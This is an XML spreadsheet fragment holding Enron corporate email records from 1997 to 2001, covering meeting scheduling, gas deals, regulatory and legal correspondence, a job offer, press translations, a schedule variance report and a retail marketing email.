    <t>Call w/ TECO tomorrow at 10:30 Central</t>
  </si>
  <si>
    <t xml:space="preserve">for calendar, especially 930_x000D_
_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 05/29/2001 03:01 _x000D_
PM ---------------------------_x000D_
From: Ben Jacoby/ENRON@enronXgate on 05/29/2001 02:59 PM_x000D_
To: Fred Mitro/ENRON@enronXgate, Kay Mann/Corp/Enron@Enron_x000D_
cc: Lorie Leigh/ENRON@enronXgate _x000D_
_x000D_
Subject: Call w/ TECO tomorrow at 10:30 Central_x000D_
_x000D_
TECO has asked that we schedule our call for tomorrow at 10:30 AM. Kay, I _x000D_
would like to meet with you at 9:30 to discuss the MOU. I don't believe their _x000D_
counsel will be on the call at 10:30, therefore your participation is _x000D_
optional (although you know we'd always prefer to have you)._x000D_
_x000D_
Regards,_x000D_
_x000D_
Ben_x000D_
_x000D_
Lorie:_x000D_
_x000D_
Please put the TECO call on my and Fred's calendar. Thanks._x000D_
</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rebecca.griffin@enron.com'})</t>
  </si>
  <si>
    <t>Re: CP&amp;l</t>
  </si>
  <si>
    <t xml:space="preserve">Deal 706674_x000D_
_x000D_
D_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Rebecca Griffin@ENRON_x000D_
03/30/2001 04:12 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: CP&amp;l_x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Rebecca_x000D_
---------------------- Forwarded by Rebecca Griffin/NA/Enron on 03/30/2001 _x000D_
04:11 PM ---------------------------_x000D_
_x000D_
_x000D_
Janet H Wallis@ECT_x000D_
03/29/2001 08:49 AM_x000D_
To: Rebecca Griffin/NA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: CP&amp;l_x000D_
_x000D_
Please add a spot sale for Feb 21 at $5.16 for 5K._x000D_
_x000D_
Thanks Janet_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 20:10:29 -0700 (PDT)</t>
  </si>
  <si>
    <t>Wow. So I didn't go to hot yoga and you didn't answer our calls to come meet us. What's up with that?  Should I take it personally?_x000D_
_x000D_
H_x000D_
Heather Kroll</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 02:39:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'davila1@txu.com', 'ggreen2@txu.com', 'cstone1@txu.com', 'kenenglish@txu.com', 'gary.a.hanks@enron.com', 'liz.bellamy@enron.com', 'daren.j.farmer@enron.com', 'earl.tisdale@enron.com'})</t>
  </si>
  <si>
    <t>HPL Nom for January 12, 2001</t>
  </si>
  <si>
    <t>(See attached file: HPLN0112.xls)_x000D_
_x000D_
 - HPLN0112.xls</t>
  </si>
  <si>
    <t>Thu, 10 Aug 2000 03:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: NCNG Delivery Points</t>
  </si>
  <si>
    <t xml:space="preserve">Allyson,_x000D_
_x000D_
Thank you for your prompt response.  _x000D_
_x000D_
Can you describe the process and timing for filing a project update?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Duncan, Allyson" &lt;aduncan@kilstock.com&gt; on 08/10/2000 09:45:11 AM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc: "Fine, Jonathan" &lt;JFine@kilstock.com&gt;, "'Jeffrey.M.Keenan@enron.com'" _x000D_
&lt;Jeffrey.M.Keenan@enron.com&gt;, "'Tom.Chapman@enron.com'" _x000D_
&lt;Tom.Chapman@enron.com&gt;, "'Heather.Kroll@enron.com'" _x000D_
&lt;Heather.Kroll@enron.com&gt;, "'Ozzie.Pagan@enron.com'" &lt;Ozzie.Pagan@enron.com&gt; _x000D_
_x000D_
Subject: RE: NCNG Delivery Points_x000D_
_x000D_
I inadvertently ended the sentence with a comma.  The point I was making was_x000D_
that if it were necessary to negotiate an additional delivery point, NCNG_x000D_
would probably demand concessions such as an extension of the contract_x000D_
period.  Hopefully, since we are only talking about a high pressure tap,_x000D_
NCNG will have less leverage._x000D_
_x000D_
Jeffrey and I did talk about amending the application some time ago;  he_x000D_
expressed the concern that the description of the generators might be_x000D_
misleading unless either more or less data were supplied, and he suggested_x000D_
describing them more generally.  I think he was confortable with the fact_x000D_
that the CPCN will be reviewed by electrical engineers who understand the_x000D_
generators described without the elaboration he thought necessary._x000D_
_x000D_
One of the problems with amending the application is that you run the risk_x000D_
that the Commission will adjust the time frames for intervention, etc.,_x000D_
accordingly.  If you want to revise the description of the equipment, it_x000D_
would be less dangerous to file a project update.   _x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Wednesday, August 09, 2000 6:48 PM_x000D_
To: Duncan, Allyson_x000D_
Cc: Fine, Jonathan; Jeffrey.Keenan@enron.com; Tom.Chapman@enron.com;_x000D_
Heather.Kroll@enron.com; Ozzie.Pagan@enron.com_x000D_
Subject: Re: NCNG Delivery Points_x000D_
_x000D_
_x000D_
_x000D_
Allyson,_x000D_
_x000D_
Thank you for the email.  It seems to stop in mid sentence, so I was_x000D_
wondering if maybe something got deleted?_x000D_
_x000D_
We have an interest in having the application for the CPCN amended to be_x000D_
less specific on the equipment we will be using.  I believe Jeffrey may_x000D_
have mentioned this to you before.  We would like to follow up with that_x000D_
now, unless there is some significant problem with it._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Duncan, Allyson" &lt;aduncan@kilstock.com&gt; on 08/07/2000 02:27:23 PM_x000D_
_x000D_
To:   "'Mann Kay'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:   "Fine, Jonathan" &lt;JFine@kilstock.com&gt;_x000D_
_x000D_
Subject:  NCNG Delivery Points_x000D_
_x000D_
There would seem to me to be two questions--the threshold one is whether_x000D_
the_x000D_
site is within Rocky Mount's service territory.  If it is, then what_x000D_
obligation does NCNG have with respect to the construction of a delivery_x000D_
point.  I haven't reviewed the annexation statutes yet, but based on my_x000D_
initial reading of the Service Area Territory Agreement between Rocky Mount_x000D_
and NCNG, once annexed the site would come within Rocky Mount's purview to_x000D_
serve, and, although a "mutually agreeable" delivery point would have to be_x000D_
negotiated, NCNG would at least have to negotiate that in good faith._x000D_
_x000D_
The January 13, 1992 Service Area Territory Agreement gives Rocky Mount the_x000D_
right to distribute natural gas within the city's incorporated limits as_x000D_
well as a specified area outside the incorporated limits.   The contract_x000D_
goes on to provide that should any part of that perimeter be annexed into_x000D_
the city, "the respective rights of the parties as to service in any such_x000D_
portion shall be determined by applicable case law and the General Statutes_x000D_
of North Carolina. . ."  The contract further provides that absent an order_x000D_
of the NCUC to the contrary, NCNG agrees that Rocky Mount has the right to_x000D_
serve all end users within the "aforementioned" area--presumably referring_x000D_
to the annexed area, although the agreement is not a model of clarity._x000D_
_x000D_
So, at least based on this language, Rocky Mount's right to serve arguably_x000D_
tracks its incorporated limits, whatever they might be.  (Jonathan and I_x000D_
are_x000D_
looking at annexation law to see what else might be lurking out there)._x000D_
_x000D_
The 1992 Service agreement provides, In Article IV, provides that points of_x000D_
devliery for all natural gas purchased or transported under the agreement_x000D_
with NCNG shall be "at the following locations and other stations added at_x000D_
mutually agreeable locations in the future. . ." In the Third Amendment to_x000D_
the Natural Gas Service Agreement, dated March 10, 1997, new language and_x000D_
delivery points are negotiated upon, but the principle is still included_x000D_
that  other stations may be added at "mutually agreeable locations in the_x000D_
future."  The question which then arises is what Rocky Mount would have to_x000D_
give in exchange.  In the 1997 agreement, Rocky Mount agreed to an_x000D_
extention_x000D_
of terms of the of ten years, until December 6,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'amber.keenan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'richard.shapiro@enron.com', 'gra@enron.com'})</t>
  </si>
  <si>
    <t>Enron Directo weekly development</t>
  </si>
  <si>
    <t xml:space="preserve">FYI from Alfredo._x000D_
_x000D_
_x000D_
_x000D_
Please see below some basic indicators on Enron Directo last week _x000D_
performance. For further details, please let me know._x000D_
_x000D_
Jose L_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 06:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Opps. Sorry about the confusion.  We are selling the equity in CA to Coral, _x000D_
so I call it by that name.  I'm looking for a list of what you need as _x000D_
referencedin the last line of this email._x000D_
_x000D_
Hope that helps,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cobb, Chris" &lt;chriscobb@akllp.com&gt; on 12/04/2000 01:37:49 PM_x000D_
To: &lt;kay.mann@enron.com&gt;_x000D_
cc: "Thompson, Peter J." &lt;peterthompson@akllp.com&gt; _x000D_
_x000D_
Subject: Attached Files_x000D_
_x000D_
_x000D_
Kay,_x000D_
   Attached are the latest versions of the CA Energy Development_x000D_
breakout agreements.  Please note that, because the agreements deal with_x000D_
only one Unit each, the term "Unit Liability Amount" has been replaced_x000D_
with "Maximum Liability Amount."  Also, there is no need for an Exhbit_x000D_
N-1, so that reference has been deleted as well.  The agreement is still_x000D_
missing an Agreement Reference number, Ben Jacoby's fax number, and the_x000D_
information needed for the exhibits.  Thanks, Chris_x000D_
 &lt;&lt;break out agreement--CA Energy Devlopment II (12/4/00).DOC&gt;&gt;  &lt;&lt;break_x000D_
out CA Energy Dev. I  (12/4/00).DOC&gt;&gt; _x000D_
 - 00).DOC_x000D_
 - 00).DOC_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 17:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/26/01; HourAhead hour: 1;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Start Date: 4/26/01; HourAhead hour: 1;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2601.txt_x000D_
_x000D_
---- SC Trades Schedule ----_x000D_
$$$ Variance found in table tblInt_Interchange._x000D_
     Details: (Hour: 1 / Preferred: 112.00 / Final: 111.97)_x000D_
  TRANS_TYPE: FINAL_x000D_
  SC_ID: EPMI_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/26/01_x000D_
  TRADING_SC: PWRX_x000D_
  PNT_OF_INTRC: SP15_x000D_
  SCHED_TYPE: ENGY_x000D_
  PURCH_SALE: 2_x000D_
  DEAL_NO: 1_x000D_
_x000D_
_x000D_
_x000D_
---- Load Schedule ----_x000D_
$$$ Variance found in table tblLoads._x000D_
     Details: (Hour: 1 / Preferred:  97.03 / Final:  96.84)_x000D_
  TRANS_TYPE: FINAL_x000D_
  LOAD_ID: SDG1_x000D_
  MKT_TYPE: 2_x000D_
  TRANS_DATE: 4/26/01_x000D_
  SC_ID: EPMI_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 10 May 2001 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'my-prs@irjgroup.co.jp'})</t>
  </si>
  <si>
    <t>frozenset({'ed.cattigan@enron.com', 'eva.hoeffelman@enron.com', 'akiko.higaki@enron.com', 'vance.meyer@enron.com', 'stefan.niesler@enron.com', 'jonathan.whitehead@enron.com', 'karen.denne@enron.com', 'michael.grimes@enron.com', 'skean@enron.com', 'ann.m.schmidt@enron.com', 'day@enron.com', 'rousseau.anai@enron.com', 'morten.e.pettersen@enron.com', 'brian.stanley@enron.com', 'mika.watanabe@enron.com', 'andy.foote@enron.com', 'tom.fitzgibbon@enron.com', 'katy.lomax@enron.com', 'jeremy.thirsk@enron.com', 'joseph.p.hirl@enron.com', 'jackie.gentle@enron.com', 'mark.palmer@enron.com', 'makiko.imai@enron.com', 'sloan@21stenergy.com'})</t>
  </si>
  <si>
    <t>Translation - Nihon Keizai 5/7, Sankei 5/10, Nikkei Sangyo 5/10_x000D_
 (Enron Mention)</t>
  </si>
  <si>
    <t>SK - I've printed these out and put them in your meeting folder.  mm_x000D_
_x000D_
_x000D_
Please find attached translation of following articles:_x000D_
_x000D_
"Who is the fiend of the Heisei era? - transformation of a public_x000D_
utility (1)"_x000D_
(Nihon Keizai Shimbun dated May 7)_x000D_
_x000D_
"U.S.-based Enron urges Japan to separate transmission from the_x000D_
operations of electric power companies" (Sankei Shimbun dated May 10)_x000D_
_x000D_
"Enron draws up a document on deregulation in the electricity industry"_x000D_
(Nikkei Sangyo Shimbun dated May 10)_x000D_
_x000D_
Best regards,_x000D_
IRJ PR Services_x000D_
_x000D_
 - Nihon Keizai 10507.doc_x000D_
 - Sankei 10510.doc_x000D_
 - Nikkei Sangyo 10510.doc</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 08:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Giuseppe Paleologo</t>
  </si>
  <si>
    <t>Molly,_x000D_
_x000D_
Giuseppe is finishing his Ph.D. at Stanford and worked for us last summer.   _x000D_
We would like to make him an offer to bring him as a manager.   Vince would _x000D_
like to offer $110 k base plus a $20k signing bonus and whatever would be the _x000D_
appropriate relocation package (He is single.).     He is leaving on Monday _x000D_
for Europe, so it would be preferable if we can get an offer letter in his _x000D_
hands by Friday or Saturday.    I have verbally given him this offer already, _x000D_
but told him that you would be the expert regarding what is covered in the _x000D_
relocation part.    He should be sending me his current address by email _x000D_
which I will forward to you a.s.a.p._x000D_
_x000D_
thanks,_x000D_
_x000D_
Stinson_x000D_
x34748_x000D_
_x000D_
P.S.   Regarding Jinbaek.  We would be happy to pay his air ticket._x000D_
_x000D_
_x000D_
---------------------- Forwarded by Stinson Gibner/HOU/ECT on 04/25/2001 _x000D_
03:26 PM ---------------------------_x000D_
_x000D_
_x000D_
Giuseppe Andrea Paleologo &lt;gappy@stanford.edu&gt;@Stanford.EDU on 04/23/2001 _x000D_
07:33:29 PM_x000D_
Please respond to gappy@stanford.edu_x000D_
Sent by: gappy@Stanford.EDU_x000D_
To: Stinson.Gibner@enron.com_x000D_
cc:  _x000D_
Subject: Re: From Stinson_x000D_
_x000D_
_x000D_
Stinso, nice to hear from you. Things are going well here. The only_x000D_
annoyance comes from the INS. I applied for curricular practical_x000D_
training, and it will take about three months to have the work permit._x000D_
Receiving an H-1 takes understably much longer. Other than this, I would_x000D_
like to know how are things in the research group and EBS._x000D_
I will leave for Italy next Monday and will stay there two weeks. I hope_x000D_
to hear from you before my departure._x000D_
_x000D_
Giuseppe_x000D_
_x000D_
Stinson.Gibner@enron.com wrote:_x000D_
&gt;_x000D_
&gt; Giuseppe,_x000D_
&gt;_x000D_
&gt; How are you?   Is your thesis still on schedule?    I hope things are going_x000D_
&gt; well.   I will try and give  you a call in the next day or two to see how_x000D_
&gt; things are going and to bring you up to date on what's going on here at_x000D_
&gt; Enron.   Look forward to talking with you._x000D_
&gt;_x000D_
&gt; --Stinson_x000D_
_x000D_
--_x000D_
Giuseppe A. Paleologo_x000D_
email: gappy@stanford.edu_x000D_
office phone: (650) 725-0541</t>
  </si>
  <si>
    <t>Sat, 29 Dec 2001 14:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dalvan@mediaone.net'})</t>
  </si>
  <si>
    <t>SVP Sales Opportunity</t>
  </si>
  <si>
    <t>Saturday, December 29, 2001_x000D_
_x000D_
Richard B Buy_x000D_
Enron_x000D_
,   _x000D_
_x000D_
Dear Richard,_x000D_
_x000D_
Good Morning._x000D_
_x000D_
Thank you very much for your suggestions and input with my search for_x000D_
KWI.  We are at the final stages of that search and have identified an_x000D_
exciting superior candidate  for that position._x000D_
_x000D_
I am writing to ask for your input and suggestions regarding another early_x000D_
stage Software Company in the Energy space.  They are located in Atlanta_x000D_
Georgia.  The positon we are seeking to fill is an SVP of Sales.  This_x000D_
will be a key position,  part of the Executive Management team and will_x000D_
be integral to driving our client towards profitability and ultimately_x000D_
an IPO.  If you have any ideas of exciting potential candidates or if_x000D_
you have an interest your self, please contact meat 781-874-0527 or email_x000D_
me at dalvan@mediaone.net._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Dal Coger_x000D_
781-395-2981_x000D_
781-874-0527_x000D_
_x000D_
_x000D_
_x000D_
Our Client is a leading global supplier of real-time software solutions_x000D_
for distribution utilities. Our Client's flagship product optimizes distributio_x000D_
n-network operations, and includes software suites which provide an information_x000D_
 infrastructure and applications for the delivery of the "high 9's" reliability_x000D_
 and power quality levels demanded by the digital economy. Our Client_x000D_
was established in 1990 and is based in Atlanta, Georgia, with development_x000D_
headquarters in Minneapolis, Minnesota and Asia Pacific headquarters in_x000D_
Brisbane, Australia._x000D_
_x000D_
Our Client's customers include over 35 distribution utility companies_x000D_
representing over 20 million service connections. Representative customers_x000D_
include Southern Company, Baltimore Gas &amp; Electric, Con Edison, Duke,_x000D_
Reliant, Northeast Utilities, Northern Ireland Electricity, United Energy_x000D_
of Australia, Cinergy, Alliant, Public Service of New Mexico, Toronto_x000D_
Hydro, and San Diego Gas and Electric._x000D_
?Of all your resources, information is your most precious. So, why not_x000D_
make the most of it? Our Client International is the premier, global provider_x000D_
of Web-based real-time operations resource management solutions. We help_x000D_
you leverage customer and operational data for a competitive advantage_x000D_
in the newly deregulated market. Imagine being able to anticipate and_x000D_
control resource deficits. Quickly respond to customer needs. And streamline_x000D_
utilization, regardless of your size. Now, imagine Our Client giving you_x000D_
access to reliable and timely information that supports your organization's_x000D_
growth and prosperity. Strength. Trust. And reliability.  our Client is_x000D_
Redefining Connectivity._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Sincerely,_x000D_
_x000D_
_x000D_
_x000D_
Dal Coger_x000D_
Principal</t>
  </si>
  <si>
    <t>Tue, 11 Mar 1997 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t>3125A - meeting with Van der Walde, Hartsoe, Watkiss, per Lucy_x000D_
 Marshall</t>
  </si>
  <si>
    <t>_x000D_
OK for you to join them late</t>
  </si>
  <si>
    <t>Sat, 20 Oct 2001 07:21:56 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j.harris@enron.com'})</t>
  </si>
  <si>
    <t>FW: Azurix's Case Themes</t>
  </si>
  <si>
    <t>please print the attachments.  Thank you._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	John Ale/HOU/AZURIX@AZURIX@ENRON   On Behalf Of John Ale/HOU/AZURIX@ENRON_x000D_
Sent:	Friday, October 19, 2001 3:26 PM_x000D_
To:	Derrick Jr., James; Walls Jr., Rob; Lundstrom, Bruce_x000D_
Subject:	Azurix's Case Themes_x000D_
_x000D_
I'm attaching a copy of Azurix's Request for Arbitration with ICSID in Washington relating to Azurix Buenos Aires.  The claim should be formally registered (i.e., cleared as valid for jurisdicitional purposes) today or early next week._x000D_
_x000D_
 _x000D_
_x000D_
King and Spalding put together a summary of the various themes to emphasize in the arbitration.  Much of it is quotations from provincial officials, in official reports or to the press, demonstrating the political nature of the Province's decisions.  This should give you a flavor of our case._x000D_
_x000D_
  - 3D_L01!.DOC _x000D_
_x000D_
_x000D_
&lt;Embedded Picture (Device Independent Bitmap)&gt;</t>
  </si>
  <si>
    <t>Thu, 21 Jun 2001 18:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>NOTE FOR MONDAY CALL</t>
  </si>
  <si>
    <t xml:space="preserve">SK - Rick said you will need to review this document prior to your phone call on Monday w/ him &amp; Seabron.        mm_x000D_
_x000D_
----- Forwarded by Maureen McVicker/NA/Enron on 06/21/2001 03:36 PM -----_x000D_
_x000D_
_x000D_
	James D Steffes 06/21/2001 02:47 PM 	   To: Ginger Dernehl/NA/Enron@Enron, Maureen McVicker/NA/Enron@Enron  cc:   Subject: NOTE FOR MONDAY CALL	_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Tue, 26 Jun 2001 09:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>The Original Advantage #e12206</t>
  </si>
  <si>
    <t xml:space="preserve">[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
June 26, 2001_x000D_
_x000D_
Can't read this email? Click here_x000D_
Issue#: e12206_x000D_
_x000D_
PROVANTAGE Customer: jeff_dasovich@enron.com_x000D_
_x000D_
To unsubscribe from the?_x000D_
Original Advantage Click here_x000D_
(Do Not Reply to this email)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Products that give you the Professional Advantage! _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
IntelliMouse v3.0 Serial &amp; PS/2 for Windows 9x/NT _x000D_
By Microsoft  _x000D_
_x000D_
Now features improved mouse software. _x000D_
Similar to MS Mouse with a wheel located between the two buttons. The wheel _x000D_
permits "zoom and scroll" ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$18.53    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Visual Basic v6.0 Learning Edition _x000D_
By Microsoft  _x000D_
_x000D_
$50 mfg rebate coupon included for owners of: VB4 Std; VB5 Learning Edition; _x000D_
Office Pro 5.0 or later; and Office Developer Edition 97 or later -- through _x000D_
...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$85.91    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
eTrex Legend _x000D_
By Garmin International  _x000D_
_x000D_
With the eTrex Legend, GARMIN has loaded a full basemap of North and South _x000D_
America into one small unit.  _x000D_
The basemap contains lakes, rivers, cities, ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$206.58    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Norton SystemWorks 2001 v4.0 STANDARD for Windows _x000D_
By Symantec  _x000D_
_x000D_
$20 ($30 CDN) mfg rebate on SYMO014 (single user pkg) for owners of ANY _x000D_
retail (boxed or downloaded), standalone versions of Norton SystemWorks, ..._x000D_
More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$56.59    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
PC750 PCI Dual-Slot Internal Reader _x000D_
By Actiontec  _x000D_
_x000D_
The PC750 PC Card Reader brings the functionality, portability and _x000D_
convenience of PC Card (PCMCIA) technology to your desktop. With this card _x000D_
reader, mobile ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$79.59    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Async Professional v3.05 _x000D_
By TurboPower Software  _x000D_
_x000D_
New Async Professional 3 is the one toolkit with everything you need for _x000D_
Delphi and C++Builder communications programming. From simple _x000D_
telecommunications, ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$229.95    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
MiniView 4-Port PS2 KVM Switch w/Cables _x000D_
By IOGEAR  _x000D_
_x000D_
Buy a MiniView 4-Port PS/2 KVM Switch between June 15, 2001 and September 30, _x000D_
2001 and receive $30 cash back! To receive your rebate coupon click ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$124.55    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
OmniForm v4.01 for Win98/95/NT _x000D_
By ScanSoft _x000D_
_x000D_
Take any paper form, scan it with OmniForm, and wow! You've got an electronic _x000D_
form that you can fill out right on your computer screen! But that's only ..._x000D_
More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$122.94    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Nu-Form 105-Key Ergo Keyboard w/ Touchpad PS/2 _x000D_
By Adesso  _x000D_
_x000D_
The Nu-Form ergonomic keyboard provides the most comfortable solution for the _x000D_
traditional typist. It's built-in wrist support, split keyboard design, and _x000D_
...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$42.93    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Cyber-shot DSC-S75 Camera 3.34 MP CCD 2048x1536 _x000D_
By Sony _x000D_
_x000D_
The CyberShot S-Series digital cameras provide entry into the advanced world _x000D_
of Sony digital photography. With more features and impressive image control, _x000D_
...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$632.95    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Smart 450 VA Rack-Tower Line-Int 5-outlet _x000D_
By Tripp Lite  _x000D_
_x000D_
Software and cabling included for all the control and power management of the _x000D_
SmartPro UPS in a 19" rackmount configuration with "Hot Swap" battery _x000D_
capabilities. ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$181.77    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
56K Faxmodem PCI For Windows _x000D_
By U.S. Robotics  _x000D_
_x000D_
Outstanding value, exceptional reliability, and easy installation make the _x000D_
U.S. Roboticsr 56K* Faxmodem PCI the perfect choice for casual users. With _x000D_
reliability ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$34.31    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
New!_x000D_
CanoScan D1230UF Flatbed Scanner 1200x2400dpi USB _x000D_
By Canon  _x000D_
_x000D_
_x000D_
Advanced Photo and Film Scanning Made Easy._x000D_
_x000D_
The CanoScan D1230UF USB Flatbed Scanner puts state-of-the-art, user-friendly _x000D_
film ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$249.50    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
GC-QX5HD Digital Camera 3.3MPIX USB 2032x1536 16MB _x000D_
By JVC  _x000D_
_x000D_
The GC-QX5HD is the newest, state-of-the-art, digital still camera from JVC. _x000D_
The 3.34 Mega Pixel CCD allows for high quality pictures at resolutions up _x000D_
...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$749.95    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Rage Fury Pro 32MB AGP _x000D_
By ATI Technologies  _x000D_
_x000D_
_x000D_
Powered by ATI RAGE 128 PRO graphics engine _x000D_
32-bit true color 3D acceleration (16.7 million colors) up to 1920x1200 _x000D_
2D graphics up to 1920x1200@32bpp ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$68.36    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
Personal Picture Maker 200 by Lexmark _x000D_
By Kodak  _x000D_
_x000D_
PPM200 Presented "Best of What's New" Award From Popular Science Magazine! _x000D_
Do you want to get vibrant, photo-quality prints from your printer? ...More _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
??$168.95    _x000D_
[IMAGE]_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
?_x000D_
?_x000D_
_x000D_
Web Address: www.PROVANTAGE.com?_x000D_
?Toll Free: 800-336-1166???? Fax: 330-494-5260???? email: _x000D_
sales@provantage.com _x000D_
_x000D_
Privacy Policy | Terms &amp; Conditions | FREE Catalog _x000D_
_x000D_
_x000D_
_x000D_
,2001 PROVANTAGE Corporation, 7249 Whipple Ave. NW, North Canton, OH 44720_x000D_
_x000D_
